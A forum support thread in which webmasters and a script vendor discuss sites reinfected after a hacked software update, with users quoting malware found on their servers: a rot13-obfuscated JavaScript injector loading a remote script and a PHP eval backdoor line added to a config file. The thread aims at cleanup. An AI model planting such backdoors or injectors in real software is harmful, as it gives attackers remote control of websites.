Topic: build 43 / hacked again

[ip0li]

Guys I am waiting for kildoozer, just woke up after insane day yesterday(shitload of work).

When he arrives we will try to solve your issues or write here what to do.

[ip0li]

Ok kildoozer is already working on tool to lock tp files so they are not writable (more details soon dont worry all will work fine ).

It will be done today, then I will write instructions in forum on how to fix/lock your tp's!

Please stay tuned, finally we nailed this SOB.

[donedeal]

Looking forward to something to help, im still infected with 47 sites thats making someone else money

[ip0li]

Please I know I ask MUCH but I ask you bit more of patience, kildoozer today inspected your servers and clean some files, tomorow he continues...he was again without damn electricity entire day! He also coded for a tiny bit new secure locking system hopefully tomorrow all is solved. When we clean your server we will deposit some $$$ to broker of your choice so U can buy some feed to compensate!!!

Once again, my apologies!

[ip0li]

For all who still have problems with hack here is solution:

http://forum.scriptpulse.com/index.php/topic,1484.0.html

[donedeal]

8888<script888888 language="JavaScript"
type="text/javascript">function rot13(input){return
input.replace(/[a-zA-Z]/g,function(ch){return
String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg
fep=\"uggc://mvk.vz/!tybony/.cuc\"></fpevcg>"));888888</script88888

is this code yours or his? (i added 88888'8 in the code here to post)

[ip0li]

I think its his, please follow instructions here: http://forum.scriptpulse.com/index.php/topic,1484.0.html

[donedeal]

Just going through the server cleaning up this stuff. I also have a vulnerablilty to show you

[ip0li]

great, email me details to info@scriptpulse.com !

[Ska]

it happend again
after cleaning it, locking it.
all files are back at 777 and tpupdater.php
was changed.

/stats/cache/auth.php
was found with the scan.php

if (isset($_REQUEST["auth"])) eval(stripslashes($_REQUEST["auth"]));
this was added to variables.php

[donedeal]

was finding these in the toplists tpl and html files, just a heads up to everyone to help clean up, last line of code

[ip0li]

If U cleaned and locked, speak with your host why files got replaced, its not in our domain . Basically its wrong apache config or they use suphp so process (shell scripts) run under user.

Please consult your webhost and point them to changelog. If they have any questions info@scriptpulse.com

[donedeal]

If U cleaned and locked, speak with your host why files got replaced, its not in our domain . Basically its wrong apache config or they use suphp so process (shell scripts) run under user.

The problem is the cleaning. No one has really posted a good cleaning process. Its hopping out of the TP folder. You can delete the whole tp folder and install from scratch, it comes back. The backdoors or scripts are still outside of the tp folder. Yes there are hacked tp files, but thats not the backdoor.

Lets not forget the original problem was the hacked update. This "Hack" that "keeps coming back" means it wasnt cleaned off the server properly. Yes we can "lock it". But it doesnt mean the "hack" is off your server. I dont believe for a second that this hack has anything to do with our original server security/configuration.

Once this tp updater hack gets on your server, your basically fucked. because the timestamps of the hacked files match on all domains on a server. Even on fresh tp installs. and by fresh, i mean deleting the tp folder completly AND toplist folders, its back a day later.

I have something for anyone to try... move your domain to a virgin server, install Smart thumbs, trade pulse from scratch, import your thumbs from another smart thumbs and a exported tradeslist, check your toplist codes before you import them, see your problem dissappear.

Has anyone tried this besides me and see it come back? I would like to hear this....

I know that your files where hacked and im not blaming you for that, but sorry, I have a tough time with your statment, this gives me the impression that your passing the cause of this problem to our servers config or hosting admin.

Im not trashing you, but I dont see any problem with TP being hacked when your server is actually clean. The problem is getting your server clean. A lock.php isnt going to take out the backdoor on your server.

[ip0li]

I agree 500% with you that lock.php is not FINAL solution, but lock.php is temp solution till your hoster cleans out shell scripts!

Servers are not our domain(we are doing SCRIPTS) so your hoster should clean it up and if they have any questions they are free to post here or over icq 169397168 or email info@scriptpulse.com.

This hack didn't come because of your server security, it came because of OUR server security when hacker got it and changed update files for cpl hrs .

I said your server security is bad in case shell exec scripts can change locked files.